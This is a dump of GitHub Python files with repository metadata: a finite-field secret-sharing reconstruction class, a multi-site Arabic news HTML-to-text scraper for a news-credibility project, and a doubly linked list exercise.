gloriamaris/designsouth-reg | 5,841,155,544,621 | f15be12ae2341b7bea6195dc0ba486785528f751 | 45a81062272778f3da70f1a00e39913527e93d1f | /designsouthreg/local/__init__.py | 6cb49dceec514f1006a65c832dadfd8849c7e632 | []
| no_license | https://github.com/gloriamaris/designsouth-reg | b92d69fd8a280aaf8525eec7056981482368967e | dc86214a41fec548c91469ae393a6a45e2144811 | refs/heads/master | 2020-04-08T19:52:19.163144 | 2018-11-30T15:39:55 | 2018-11-30T15:39:55 | 159,674,159 | 1 | 0 | null | false | 2018-11-29T16:12:47 | 2018-11-29T13:55:49 | 2018-11-29T15:02:28 | 2018-11-29T16:12:46 | 12 | 0 | 0 | 0 | Python | false | null | /home/monique/Documents/Projects/Personal/designsouthreg/designsouthreg/__init__.py | UTF-8 | Python | false | false | 83 | py | 7 | __init__.py | 6 | 0.843373 | 0.843373 | 0 | 1 | 83 | 83 |
nguyenduchien1994/Secret_Sharing | 14,774,687,530,419 | b2766cbcd1a960b582b8f6b31b69dd101957d938 | 0c0b8edd6947cf0fcd66ff74d8f0242e9182645f | /SecretRecon.py | aed365eabc293e5f1933cdf0c5f7fa87e97baa8d | []
| no_license | https://github.com/nguyenduchien1994/Secret_Sharing | ae806a85b736574a5e734a5f2be5808d8066fa3d | d3ea632113f7d17c925d98f7062e69078712ecb3 | refs/heads/master | 2020-04-05T11:22:30.706424 | 2017-07-07T16:47:45 | 2017-07-07T16:47:45 | 81,397,311 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import sys
sys.path.append("/ad/eng/users/h/e/heinous/Desktop/Research/Secret_Sharing/Finite-Field")
sys.path.append("/home/heinous/Desktop/Research/SecretSharing/Secret_Sharing/Finite-Field")
import ffield
class SecretRecon():
def __init__(self,f):
self.f = f
self.F = ffield.FField(self.f)
def recon_2(self,chosen):
denom = self.F.Add(int(chosen.keys()[0],2),int(chosen.keys()[1],2))
nom = self.F.Add(int(chosen.values()[0],2),int(chosen.values()[1],2))
E = self.F.Multiply(nom,self.F.Inverse(denom))
return ('{0:0'+str(self.f)+'b}').format(E)
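    # Illustrative call (assumes the Python 2 dict semantics used throughout this file and a
    # 4-bit field, i.e. SecretRecon(4); keys are share x-coordinates and values are the shares,
    # both given as binary strings):
    #   sr = SecretRecon(4)
    #   sr.recon_2({'0001': '1010', '0011': '0110'})   # -> 4-character binary string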
def recon_3(self,chosen):
E = 0
for x in chosen.keys():
D = chosen[x]
nom = int(D,2)
denom = 1
for y in chosen.keys():
if y != x:
denom = self.F.Multiply(denom,self.F.Add(int(x,2),int(y,2)))
E = self.F.Add(E,self.F.Multiply(nom,self.F.Inverse(denom)))
return ('{0:0'+str(self.f)+'b}').format(E)
| UTF-8 | Python | false | false | 1,029 | py | 16 | SecretRecon.py | 7 | 0.559767 | 0.541302 | 0 | 32 | 31.15625 | 91 |
ibraaaa/news-credibility | 644,245,096,681 | 55aac651386100719cf558f569cfd58c4d796867 | e914c69576b89833b7ead49569701f4a97958f3a | /src/python/parsers/html_parser.py | dacff6c95db50c53c959775baed79d8b0bc734bb | [
"Apache-2.0"
]
| permissive | https://github.com/ibraaaa/news-credibility | 3c439be20db18d3f364f3e19b460d952ae1272b8 | cae1009d9def17c058342c3dee969f2babcd0c9e | refs/heads/master | 2020-04-15T08:14:50.190724 | 2019-01-07T00:20:35 | 2019-01-07T00:20:35 | 164,347,496 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | #!/usr/bin/python
# -*- coding: utf-8 -*-
import lxml.html
import os.path
import threading
import traceback
import util.const as CONST
import util.db as db
import util.helper as helper
from multiprocessing import Pool
class HTMLParser(object):
def __parse_shorouk(self, html_):
page_ = lxml.html.fromstring(html_)
title_ = page_.find_class('right')
data_ = []
# Get article title.
for x in title_:
text_nodes_ = x.xpath('h1/child::text() | h3/child::text()')
title_text_ = ''
for text_node_ in text_nodes_:
if text_node_:
title_text_ += text_node_.encode('utf-8').lstrip() + ' '
if title_text_: data_.append(title_text_)
#CHECK: ../data/rss/html/shorouknews/accidents/67/2013-02-21%2020:10:00%2367a7c33d-ace1-4fa9-aa3c-a227a53714ec.html
# Fixed manual for now
body_ = page_.find_class('rightContent-newSize')
# Get article body.
for x in body_:
text_nodes_ = x.xpath('p/descendant::text()')
for text_node_ in text_nodes_:
if text_node_:
data_.append(text_node_.encode('utf-8'))
# helper.WRITE_FILE('/home/ibraaaa/Desktop/test_1.txt', '\n'.join(data_))
return '\n'.join(data_)
def __parse_cnn_arabic(self, html_):
page_ = lxml.html.fromstring(html_)
title_ = page_.xpath("//div[@class='cnn_storyarea']/h1/child::text()")
data_ = []
for text_ in title_:
if text_: data_.append(text_.encode('utf-8'))
body_ = page_.xpath("//div[@class='cnn_strycntntrgt']/p/descendant::text()")
for text_ in body_:
if text_: data_.append(text_.encode('utf-8'))
#helper.WRITE_FILE('/home/ibraaaa/Desktop/test_1.txt', '\n'.join(data_))
return '\n'.join(data_)
def __parse_akhbarelyomgate(self, html_):
"""Parses HTML from 'Akhbar El-Yom'. Articles are laid out in tables.
Article title can be found near by an element with CSS class name
'articleTitle', we get this and then go up one step typically to
the parent row including the element with this CSS class and then
get all text nodes in the descendants
Similar approach is done for the article body but the CSS class is
'articleBody'
"""
page_ = lxml.html.fromstring(html_)
elements_ = page_.find_class('articleTitle')
data_ = []
for e in elements_:
title_ = e.xpath('parent::node()/descendant::text()')
for text_ in title_:
text_ = text_.encode('utf-8').strip()
if text_: data_.append(text_)
break;
elements_ = page_.find_class('articleBody')
for e in elements_:
body_ = e.xpath('parent::node()/descendant::text()')
for text_ in body_:
text_ = text_.encode('utf-8').strip()
if text_: data_.append(text_)
break;
return '\n'.join(data_)
def __parse_almasryalyoum(self, html_):
page_ = lxml.html.fromstring(html_)
elements_ = page_.find_class('custom-article-title')
data_ = []
for e in elements_:
title_ = e.xpath('descendant-or-self::text()')
for text_ in title_:
text_ = text_.encode('utf-8').strip()
if text_: data_.append(text_)
#elements_ = page_.find_class('panel-pane pane-node-body')
#for e in elements_:
# body_ = e.xpath("descendant-or-self::text()")
# for text_ in body_:
# text_ = text_.encode('utf-8').strip()
# if text_: data_.append(text_)
body_ = page_.xpath("//div[@class='panel-pane pane-node-body']/div[@class='pane-content']/div | //div[@class='panel-pane pane-node-body']/div[@class='pane-content']/p")
for b in body_:
ignore = False
for attribute in b.xpath("@*"):
if 'embeded-read-also' in attribute:
ignore = True
if ignore: continue
data_.extend([t.encode('utf-8').strip() for t in b.xpath("descendant-or-self::text()") if t])
#helper.WRITE_FILE('/home/ibraaaa/Desktop/test_1.txt', '\n'.join(data_))
return '\n'.join(data_)
def __parse_elfagr(self, html_):
page_ = lxml.html.fromstring(html_)
        # get_element_by_id() raises KeyError when the id is absent, so pass a default
        # to make the class-based fallback reachable.
        elements_ = page_.get_element_by_id("ctl00_ContentPlaceHolder1_maintd", None)
        if elements_ is None: elements_ = page_.find_class('DetailsPageContent')
data_ = []
for e in elements_:
text_ = e.text_content().encode('utf-8').strip()
if text_ and text_[-2:] != 'PM' and text_[-2:] != 'AM': data_.append(text_)
#helper.WRITE_FILE('/home/ibraaaa/Desktop/test_1.txt', '\n'.join(data_))
return '\n'.join(data_)
def __parse_english_ahram(self, html_):
page_ = lxml.html.fromstring(html_)
exp = "//div[@id='ctl00_ContentPlaceHolder1_divLeftTitle']";
# Title
elements_ = page_.xpath(exp + "/div[@id='ctl00_ContentPlaceHolder1_hd']/descendant::text()")
# Brief
elements_.extend(page_.xpath(exp + "/div[@id='ctl00_ContentPlaceHolder1_bref']/descendant::text()"))
data_ = []
for e in elements_:
e = e.encode('utf-8').strip()
if e: data_.append(e)
exp = "//div[@id='ctl00_ContentPlaceHolder1_divContent']/"
elements_ = page_.xpath(exp + "child::text()")
elements_.extend(page_.xpath(exp + "p/descendant::text()"))
for e in elements_:
e = e.encode('utf-8').strip()
if "short link:" in e.lower(): continue
if e: data_.append(e)
#helper.WRITE_FILE('/home/ibraaaa/Desktop/test_1.txt', '\n'.join(data_))
return '\n'.join(data_)
def __parse_fjp(self, html_):
page_ = lxml.html.fromstring(html_)
title_ = page_.xpath("//div[@id='PressRTitles']/descendant::text()")
data_ = []
for t in title_:
t = t.encode('utf-8').strip()
if t: data_.append(t)
body_ = page_.xpath("//div[@id='PressRContent']/p/descendant::text()")
body_.extend(page_.xpath("//div[@id='PressRContent']/child::text()")) # Added recently
for b in body_:
b = b.encode('utf-8').strip()
if b: data_.append(b)
# Add text from all div elements except those with attribute named 'PressRDateAdded' or 'fonts',
# which correspond to the date and author, respectively.
body_ = page_.xpath("//div[@id='PressRContent']/div")
for node in body_:
ignore = False
for attribute in node.xpath("@*"):
if 'PressRDateAdded' in attribute or 'fonts' in attribute:
ignore = True
break
if ignore: continue
data_.extend([t.encode('utf-8').strip() for t in node.xpath("descendant-or-self::text()") if t])
#helper.WRITE_FILE('/home/ibraaaa/Desktop/test_1.txt', '\n'.join(data_))
return '\n'.join(data_)
def __parse_masrawy(self, html_):
page_ = lxml.html.fromstring(html_)
title_ = page_.xpath("//div[@id='mclip']/div[@id='artical']/h1/descendant::text()")
data_ = []
for t in title_:
t = t.encode('utf-8').strip()
if t: data_.append(t)
body_ = page_.xpath("//div[@id='mclip']/div[@id='artical']/div[@id='content']/child::text()") #Added recently
body_.extend(page_.xpath("//div[@id='mclip']/div[@id='artical']/div[@id='content']/p/descendant::text()"))
for b in body_:
b = b.encode('utf-8').strip()
#print b
            # Stop when the "اقرأ أيضا:" ("Read also:") marker is reached
if u'\u0627\u0642\u0631\u0623 \u0623\u064A\u0636\u0627:'.encode('utf-8') in b: break
if b: data_.append(b)
#helper.WRITE_FILE('/home/ibraaaa/Desktop/test_1.txt', '\n'.join(data_))
return '\n'.join(data_)
    def __parse_ahram(self, html_): # AHRAM updated this site; this parser is not used anymore and is kept only for old data.
page_ = lxml.html.fromstring(html_)
exp = "//div[@id='ArticlePrintVersion']/div[@class='bbbody']/"
title_ = page_.xpath(exp + "div[@id='headDiv']/div[@id='divtitle']/span[@id='txtTitle']/descendant::text()")
data_ = []
for t in title_:
t = t.encode('utf-8').strip()
if t: data_.append(t)
body_ = page_.xpath(exp + "div[@id='abstractDiv']/descendant::text()")
body_.extend(page_.xpath(exp + "descendant-or-self::node()/div[@id='bodyDiv']/descendant::text()"))
for b in body_:
b = b.encode('utf-8').strip()
if b: data_.append(b)
#helper.WRITE_FILE('/home/ibraaaa/Desktop/test_1.txt', '\n'.join(data_))
return '\n'.join(data_)
def __parse_ahram_NEW_SITE(self, html_):
page_ = lxml.html.fromstring(html_)
data_ = []
title_ = page_.xpath("//div[@id='ctl00_ContentPlaceHolder1_divTitle']/descendant::text()")
title_.extend(page_.xpath("//div[@id='ctl00_ContentPlaceHolder1_hd']/descendant::text()"))
for t in title_:
t = t.encode('utf-8').strip()
if t: data_.append(t)
body_ = page_.xpath("//div[@id='ctl00_ContentPlaceHolder1_divContent']/descendant::text()")
for b in body_:
b = b.encode('utf-8').strip()
if b and not u'رابط دائم'.encode('utf-8') in b: data_.append(b)
return '\n'.join(data_)
def __parse_bbcarabic(self, html_):
page_ = lxml.html.fromstring(html_)
data_ = []
exp = "//div[@class=' g-w20 g-first']/div[@class='g-container']/h1/descendant-or-self::text()"
for t in page_.xpath(exp):
t = t.encode('utf-8').strip()
if t: data_.append(t)
exp = "//div[@class=' g-w20 g-first']/div[@class='g-container story-body']/div[@class='bodytext']/p/descendant::text() | "
exp += "//div[@class=' g-w20 g-first']/div[@class='g-container']/div[@class='bodytext']/p/descendant::text()"
for t in page_.xpath(exp):
t = t.encode('utf-8').strip()
if t: data_.append(t)
#for node in page_.xpath(exp):
#if node.xpath("attribute::class") == "module inline-contextual-links":
# continue
# text_ = node.xpath("descendant-or-self::text()")
# for t in text_:
# t = t.encode('utf-8').strip()
# if t: data_.append(t)
#helper.WRITE_FILE('/home/ibraaaa/Desktop/test_1.txt', '\n'.join(data_))
return '\n'.join(data_)
def __parse_dostorasly(self, html_):
page_ = lxml.html.fromstring(html_)
data_ = []
exp = "//div[@class='contentMain']/div[@class='rightArea']/"
title_ = page_.xpath(exp + "div[@class='sectionTitle']/descendant::text()")
for t in title_:
t = t.encode('utf-8').strip()
if t: data_.append(t)
body_ = page_.xpath(exp + "div[@class='authorArticleContent']/descendant::text()")
for b in body_:
b = b.encode('utf-8').strip()
if b: data_.append(b)
#helper.WRITE_FILE('/home/ibraaaa/Desktop/test_1.txt', '\n'.join(data_))
return '\n'.join(data_)
def __parse_elwatannews(self, html_):
page_ = lxml.html.fromstring(html_)
data_ = []
exp = "//div[@class='main_content_ip']/h1[@class='article_title']/descendant-or-self::text()"
title_ = page_.xpath(exp)
for t in title_:
t = t.encode('utf-8').strip()
if t: data_.append(t)
exp = "//div[@class='main_content_ip']/span[@class='SubTitle']/descendant::text()"
exp += " | //div[@class='main_content_ip']/p/descendant::text()"
body_ = page_.xpath(exp)
for b in body_:
b = b.encode('utf-8').strip()
if b: data_.append(b)
#helper.WRITE_FILE('/home/ibraaaa/Desktop/test_1.txt', '\n'.join(data_))
return '\n'.join(data_)
def __parse_english_fjp(self, html_):
page_ = lxml.html.fromstring(html_)
data_ = []
exp = "//div[@id='leftcontent']/table"
title_ = page_.xpath(exp + "/tr[3]/td/div/child::text()")
for t in title_:
t = t.encode('utf-8').strip()
if t: data_.append(t)
body_ = page_.xpath(exp + "/tr[7]/descendant::text()")
for b in body_:
b = b.encode('utf-8').strip()
if b: data_.append(b)
#helper.WRITE_FILE('/home/ibraaaa/Desktop/test_1.txt', '\n'.join(data_))
return '\n'.join(data_)
def __parse_youm7(self, html_):
page_ = lxml.html.fromstring(html_)
data_ = []
exp = "//div[@id='newsStory']/div[@id='newsStoryHeader']/"
title_ = page_.xpath(exp + 'h1/descendant::text() | ' + exp + 'h2/descendant::text() | ' + exp + 'h3/descendant::text()')
for t in title_:
t = t.encode('utf-8').strip()
if t: data_.append(t)
exp = "//div[@id='newsStory']/div[@id='newsStoryContent']/div[@id='newsStoryTxt']/p/descendant::text()" #changed child to descendant
body_ = page_.xpath(exp)
for b in body_:
b = b.encode('utf-8').strip()
if b: data_.append(b)
#helper.WRITE_FILE('/home/ibraaaa/Desktop/test_1.txt', '\n'.join(data_))
return '\n'.join(data_)
def __parse_tahrir(self, html_):
page_ = lxml.html.fromstring(html_)
data_ = []
title_ = page_.xpath("//div[@class='eventTitle']/descendant::text()")
for t in title_:
t = t.encode('utf-8').strip()
if t: data_.append(t)
body_ = page_.xpath("//div[@class='eventInner']/descendant::text()")
for b in body_:
b = b.encode('utf-8').strip()
if b: data_.append(b)
return '\n'.join(data_)
#helper.WRITE_FILE('/home/ibraaaa/Desktop/test_1.txt', '\n'.join(data_))
def __parse_akhbar_masr(self, html_):
page_ = lxml.html.fromstring(html_)
data_ = []
title_ = page_.xpath("//div[@class='content-header tr']/h2/descendant::text()")
for t in title_:
t = t.encode('utf-8').strip()
if t: data_.append(t)
body_ = page_.xpath("//div[@class='main-section user-content']/p/descendant::text()")
for b in body_:
b = b.encode('utf-8').strip()
if b: data_.append(b)
return '\n'.join(data_)
def __parse_rasd(self, html_):
page_ = lxml.html.fromstring(html_)
data_ = []
title_ = page_.xpath("//div[@class='page_news_right']/h1/descendant::text()")
title_.extend(page_.xpath("//div[@class='page_news_right']/h3/descendant::text()"))
for t in title_:
t = t.encode('utf-8').strip()
if t: data_.append(t)
body_ = page_.xpath("//div[@class='page_news_right']/div[@class='news_artical']/p/descendant::text()")
body_.extend(page_.xpath("//div[@class='page_news_right']/div[@class='news_artical']/div/descendant::text()"))
for b in body_:
b = b.encode('utf-8').strip()
if b: data_.append(b)
return '\n'.join(data_)
def __parse_almasryoon(self, html_):
page_ = lxml.html.fromstring(html_)
data_ = []
title_ = page_.xpath("//div[@id='news_shows']/div[@id='data_content_show2']/div[@id='head_topic']/div[@id='3nwan_cell']/descendant::text()")
for t in title_:
t = t.encode('utf-8').strip()
if t: data_.append(t)
body_ = page_.xpath("//div[@id='news_shows']/p/descendant::text()")
body_.extend(page_.xpath("//div[@id='news_shows']/div[@style='direction: rtl;']/descendant::text()"))
for b in body_:
b = b.encode('utf-8').strip()
if b: data_.append(b)
return '\n'.join(data_)
def __parse_alwafd(self, html_): # don't decode html from this website
page_ = lxml.html.fromstring(html_)
data_ = []
title_ = page_.xpath("//div[@class='article_title']/descendant::text()")
for t in title_:
t = t.encode('utf-8').strip()
if t: data_.append(t)
body_ = page_.xpath("//div[@class='inside impress maincom']/p/descendant::text()")
for b in body_:
b = b.encode('utf-8').strip()
if b: data_.append(b)
return '\n'.join(data_)
def __parse_akhbar_elyom(self, html_):
page_ = lxml.html.fromstring(html_)
data_ = []
title_ = page_.xpath("//div[@id='ctl00_ContentPlaceHolder1_newsPlaceHolder']/table/tbody/tr[1]/descendant::text()")
for t in title_:
t = t.encode('utf-8').strip()
if t: data_.append(t)
body_ = page_.xpath("//div[@id='ctl00_ContentPlaceHolder1_newsPlaceHolder']/table/tbody/tr/td[@class='articleBody']/descendant::text()")
for b in body_:
b = b.encode('utf-8').strip()
if b: data_.append(b)
###################################################NEW FORMAT#####################################
title_ = page_.xpath("//h4[@class='topicTitle']/descendant::text()")
for t in title_:
t = t.encode('utf-8').strip()
if t: data_.append(t)
body_ = page_.xpath("//p[@class='postTopicP']/descendant::text()")
for b in body_:
b = b.encode('utf-8').strip()
if b: data_.append(b)
return '\n'.join(data_)
def __parse_elbadil(self, html_):
page_ = lxml.html.fromstring(html_)
data_ = []
title_ = page_.xpath("//div[@id='content-region-inner']/h1/descendant::text()")
for t in title_:
t = t.encode('utf-8').strip()
if t: data_.append(t)
body_ = page_.xpath("//div[@class='field field-name-body field-type-text-with-summary field-label-hidden']/descendant::text()")
for b in body_:
b = b.encode('utf-8').strip()
if b: data_.append(b)
return '\n'.join(data_)
def __parse_dostor(self, html_):
page_ = lxml.html.fromstring(html_)
data_ = []
title_ = page_.xpath("//table[@class='contentpaneopen']/descendant::*/td[@class='contentheading']/descendant::text()")
for t in title_:
t = t.encode('utf-8').strip()
if t: data_.append(t)
body_ = page_.xpath("//table[@class='contentpanebody']/descendant::*/div[@class='article_text']/descendant::text()")
for b in body_:
b = b.encode('utf-8').strip()
if b and not 'pdf' in b and not u'تصفح جريدة الدستور اليوم'.encode('utf-8') in b: data_.append(b)
return '\n'.join(data_)
def __parse(self, news_site_, html_):
if news_site_ == CONST.AKHBAR:
return self.__parse_akhbarelyomgate(html_)
elif news_site_ == CONST.SHOROUK:
return self.__parse_shorouk(html_)
elif news_site_ == CONST.CNN_ARABIC:
return self.__parse_cnn_arabic(html_)
elif news_site_ == CONST.ALMASRY_ELYOM:
return self.__parse_almasryalyoum(html_)
elif news_site_ == CONST.FAGR:
return self.__parse_elfagr(html_)
elif news_site_ == CONST.ENGLISH_AHRAM:
return self.__parse_english_ahram(html_)
elif news_site_ == CONST.FJP:
return self.__parse_fjp(html_)
elif news_site_ == CONST.MASRAWY:
return self.__parse_masrawy(html_)
elif news_site_ == CONST.AHRAM:
return self.__parse_ahram_NEW_SITE(html_)
elif news_site_ == CONST.BBC_ARABIC:
return self.__parse_bbcarabic(html_)
elif news_site_ == CONST.DOSTOR_ASLY:
return self.__parse_dostorasly(html_)
elif news_site_ == CONST.WATAN:
return self.__parse_elwatannews(html_)
elif news_site_ == CONST.ENGLISH_FJP:
return self.__parse_english_fjp(html_)
elif news_site_ == CONST.YOUM7:
return self.__parse_youm7(html_)
elif news_site_ == CONST.TAHRIR:
return self.__parse_tahrir(html_)
elif news_site_ == CONST.AKHBAR_MASR:
return self.__parse_akhbar_masr(html_)
elif news_site_ == CONST.RASD:
return self.__parse_rasd(html_)
elif news_site_ == CONST.MASRYOON:
return self.__parse_almasryoon(html_)
elif news_site_ == CONST.WAFD:
return self.__parse_alwafd(html_)
elif news_site_ == CONST.AKHBAR_ELYOM:
return self.__parse_akhbar_elyom(html_)
elif news_site_ == CONST.BADIL:
return self.__parse_elbadil(html_)
elif news_site_ == CONST.DOSTOR:
return self.__parse_dostor(html_)
else:
print "Wrong News Site Name"
def __parse_news_site(self, news_site_, json_index_):
for path, v in json_index_.items():
if v.has_key('parsed') and v['parsed'] == True: continue
if news_site_ == CONST.YOUM7:
text_ = self.__parse(news_site_, helper.READ_FILE(path).decode('windows-1256'))
else:
text_ = self.__parse(news_site_, helper.READ_FILE(path).decode('utf-8'))
text_dir_ = os.path.dirname(path).replace('html', 'txt')
if not os.path.exists(text_dir_): os.makedirs(text_dir_)
file_ = "{0}.txt".format(os.path.basename(path)[:-5])
text_file_ = os.path.join(text_dir_, file_)
self._logger.log_info(text_file_)
helper.WRITE_FILE(text_file_, text_)
json_index_[path]['parsed'] = True
helper.UPDATE_JSON_FILE(self._index_path, path, json_index_[path])
# TODO: DELETE json_index_, will not use it anymore. DONE
def __parse_news_site_db(self, news_site_):
for index in self._db.select_unparsed_by_label(self._rss_label):
path = index.file_path
#assert path in json_index_.keys()
#assert not json_index_[path].has_key('parsed') or not json_index_[path]['parsed']
if news_site_ == CONST.YOUM7:
text_ = self.__parse(news_site_, helper.READ_FILE(path).decode('windows-1256'))
else:
text_ = self.__parse(news_site_, helper.READ_FILE(path).decode('utf-8'))
text_dir_ = os.path.dirname(path).replace('html', 'txt')
if not os.path.exists(text_dir_): os.makedirs(text_dir_)
file_ = "{0}.txt".format(os.path.basename(path)[:-5])
text_file_ = os.path.join(text_dir_, file_)
self._logger.log_info(text_file_)
helper.WRITE_FILE(text_file_, text_)
#json_index_[path]['parsed'] = True
self._db.set_parsed(path)
#helper.UPDATE_JSON_FILE(self._index_path, path, json_index_[path])
def __parse_news_from_mce(self, news_site_):
for record in self._db.get_unparsed_html(news_site_):
if news_site_ == CONST.WAFD:
text_ = self.__parse(news_site_, helper.READ_FILE(record.news_html_filepath))
elif news_site_ == CONST.YOUM7 or news_site_ == CONST.FAGR:
text_ = self.__parse(news_site_, helper.READ_FILE(record.news_html_filepath).decode('windows-1256'))
else:
text_ = self.__parse(news_site_, helper.READ_FILE(record.news_html_filepath).decode('utf-8'))
text_dir_ = os.path.dirname(record.news_html_filepath).replace('html', 'txt')
            # A freshly-created threading.Lock() cannot synchronize the separate worker
            # processes used by PARSE(), so tolerate the creation race directly instead.
            if not os.path.exists(text_dir_):
                try:
                    os.makedirs(text_dir_)
                except OSError:
                    pass  # another worker created the directory first
file_ = "{0}.txt".format(os.path.basename(record.news_html_filepath)[:-5])
text_file_ = os.path.join(text_dir_, file_)
self._logger.log_info(text_file_)
helper.WRITE_FILE(text_file_, text_)
self._db.set_news_html_parsed(record.id)
def parse_news_site(self):
self._logger.log_info(self._rss_label)
try:
news_site_ = self._rss_label
if '-' in news_site_: news_site_ = news_site_.split('-')[0]
if self._is_mce_news:
self.__parse_news_from_mce(news_site_)
else:
self.__parse_news_site_db(news_site_)
except:
self._logger.log_error(self._rss_label, traceback.format_exc())
def __init__(self, rss_label_, is_mce_news = False):
self._logger = helper.Logger(CONST.HTML_PARSER_LOG_DIR)
self._rss_label = rss_label_
self._index_path = os.path.join(CONST.RSS_HTML_INDEX_DIR, "{0}.json".format(self._rss_label))
self._db = db.IndexOperation() if not is_mce_news else db.MceWatchIndexOperation()
self._is_mce_news = is_mce_news
#if not os.path.exists(self._index_path):
# raise ValueError("Index: '{0}' doesn't exist.".format(self._index_path))
def PARSE(rss_labels_, is_mce_news = False):
parsers_ = []
for label in rss_labels_:
try:
parsers_.append(HTMLParser(label, is_mce_news))
except:
print traceback.format_exc()
if not parsers_:
print "Nothing to do."
return
#RUN_PARSER(parsers_[0])
pool = Pool(processes=16)
pool.map(RUN_PARSER, parsers_)
pool.close()
pool.join()
print "Done"
def RUN_PARSER(parser_):
parser_.parse_news_site()
if __name__ == '__main__':
PARSE(CONST.RSS_LABELS)
def correct_index_format(rss_label_):
try:
index_path_ = os.path.join(CONST.RSS_HTML_INDEX_DIR, "{0}.json".format(rss_label_))
index_ = helper.READ_JSON_FILE(index_path_)
for k, v in index_.items():
if type(v) == dict:
continue
index_[k] = {'url':v[0], 'data':v[1]}
index_path_ = index_path_.replace('index', 'new_index')
helper.WRITE_JSON_FILE(index_path_, index_)
except:
print rss_label_, '\n\n', traceback.format_exc()
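# Illustrative transformation performed by correct_index_format above:
#   {"page.html": [url, date]}  ->  {"page.html": {"url": url, "data": date}}
# correct_index below then renames the "data" key to "date".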
def correct_index(rss_label_):
try:
index_path_ = os.path.join(CONST.RSS_HTML_INDEX_DIR, "{0}.json".format(rss_label_))
index_ = helper.READ_JSON_FILE(index_path_)
for k, v in index_.items():
v['date'] = v['data']
del v['data']
index_[k] = v
index_path_ = index_path_.replace('index', 'new_index')
helper.WRITE_JSON_FILE(index_path_, index_)
except:
print rss_label_, '\n', traceback.format_exc()
| UTF-8 | Python | false | false | 27,039 | py | 155,526 | html_parser.py | 19 | 0.535839 | 0.527212 | 0 | 634 | 41.602524 | 176 |
omkar6644/Python-Training | 14,886,356,656,142 | b7b4f9f8aa35d2dc887efa3948f09a1cbfb7bb76 | cd91d4c2cef458ef0d82f4daed3fad0247e2d3c5 | /Doubly_Linked_List.py | 9dec6399b1d07a41abc290b8ff0e9f1bb08a06ca | []
| no_license | https://github.com/omkar6644/Python-Training | bde04eeffd0853d01d966eeeec8cc44300edda78 | f8212dccf2dddd6acc6cff4164d2d27324bf9564 | refs/heads/main | 2023-05-28T10:58:41.427295 | 2021-06-11T12:01:39 | 2021-06-11T12:01:39 | 364,865,236 | 0 | 0 | null | false | 2021-05-11T11:53:27 | 2021-05-06T10:03:23 | 2021-05-11T11:52:14 | 2021-05-11T11:53:26 | 12 | 0 | 0 | 1 | Python | false | false | class Node:
#Node class constructor to initialize data, next, prev
def __init__(self, value):
self.value = value
self.next = None
self.prev = None
class DoublyLinkedList:
#Linkedlist class constructor to initialize head
def __init__(self):
self.head = None
#adding elements to the list
def add(self, data):
new_node = Node(data)
new_node.next = self.head
if self.head is not None:
self.head.prev = new_node
self.head = new_node
#adding element at beginning of list
def addAtBegin(self, data):
new_node = Node(data)
new_node.next = self.head
self.head.prev = new_node
self.head = new_node
#deleting node from list
def deleteNode(self, x):
if self.head is None:
return
if self.head == x:
self.head = x.next
if x.next is not None:
x.next.prev=x.prev
if x.prev is not None:
x.prev.next=x.next
#adding element at end of list
def addAtEnd(self, data):
new_node = Node(data)
if self.head is None:
self.head = new_node
else:
n = self.head
while n.next is not None:
n = n.next
n.next = new_node
new_node.prev = n
#getting node after specified value
    def getNodeAfterValue(self,data):
        val = self.head
        res1 = None   # returned when the value is missing or has no successor
        while val:
            if val.value==data:
                if val.next is not None:
                    res1 = val.next.value
                break
            val = val.next
        return res1
#getting node before specified value
    def getNodeBefore(self,data):
        n=self.head
        res1 = None   # returned when the value is missing or sits at the head
        while n is not None:
            if n.value==data:
                if n.prev is not None:
                    res1 = n.prev.value
                break
            n=n.next
        return res1
#reversing the list
    def reverseLinkedlist(self):
        prev = None
        current = self.head
        while current:
            next_node = current.next
            current.next = prev
            current.prev = next_node   # keep the backward links consistent too
            prev = current
            current = next_node
        self.head = prev
#counting the number of elements in the list
def count(self):
temp=self.head
count=0
while temp is not None:
count=count+1
temp=temp.next
return count
#printing elements of the list
def printList(self):
if self.head is None:
return
else:
n=self.head
while n is not None:
print(n.value)
n=n.next
d = DoublyLinkedList()
d.add(10)
d.add(20)
print("adding at beginning")
d.addAtBegin(1)
d.addAtBegin(2)
d.addAtBegin(3)
d.printList()
print()
print("after deleting")
d.deleteNode(d.head.next)
d.printList()
print()
print()
print("adding at end")
d.addAtEnd(1000)
d.printList()
print()
print()
print(d.getNodeAfterValue(1))
print()
print()
print(d.getNodeBefore(1))
print()
d.reverseLinkedlist()
d.printList()
print()
print()
print("No of elements in list is: ",d.count())
| UTF-8 | Python | false | false | 3,246 | py | 49 | Doubly_Linked_List.py | 40 | 0.520025 | 0.514171 | 0 | 130 | 22.969231 | 58 |
Mokona/La-Grille | 8,074,538,565,302 | 53fb81a0503e849c9bc543c48e1bb45ebbb70016 | 81ea71bd0cd9eba88abccfa1b112d7bd7dba661e | /build/site_scons/UnitTestBuilder.py | 872fd43be2528c7bacf43d619726e075d7b398fb | []
| no_license | https://github.com/Mokona/La-Grille | 83751b5a25a21d3dc71b02f9a36e3038f159ab15 | 6a1d1d15601e04eed8b62fce287e16be16dd5157 | refs/heads/master | 2016-08-03T12:42:11.787930 | 2010-02-12T22:25:09 | 2010-02-12T22:25:09 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # Unit testing builder
import os
import os.path
def builder_unit_test(target, source, env):
app = str(source[0].abspath)
if os.spawnl(os.P_WAIT, app, app)==0:
open(str(target[0]),'w').write("PASSED\n")
else:
return 1
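# Typical SCons wiring for the builder above (illustrative; the builder and target
# names are assumptions):
#   bld = Builder(action=builder_unit_test)
#   env.Append(BUILDERS={'Test': bld})
#   env.Test('program.passed', program)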
| UTF-8 | Python | false | false | 258 | py | 126 | UnitTestBuilder.py | 119 | 0.593023 | 0.577519 | 0 | 10 | 23.6 | 50 |
1068171/CSE-Novello-Final | 3,917,010,187,549 | b6e09fafd327a140387683fccf1e0fb8d9bf4a52 | 8d5523b0b049246475e8bca1af4cd043c612a18c | /Compare_Factors_Final.py | 1ac38b86e19b217590001038780cd9c901f522ad | []
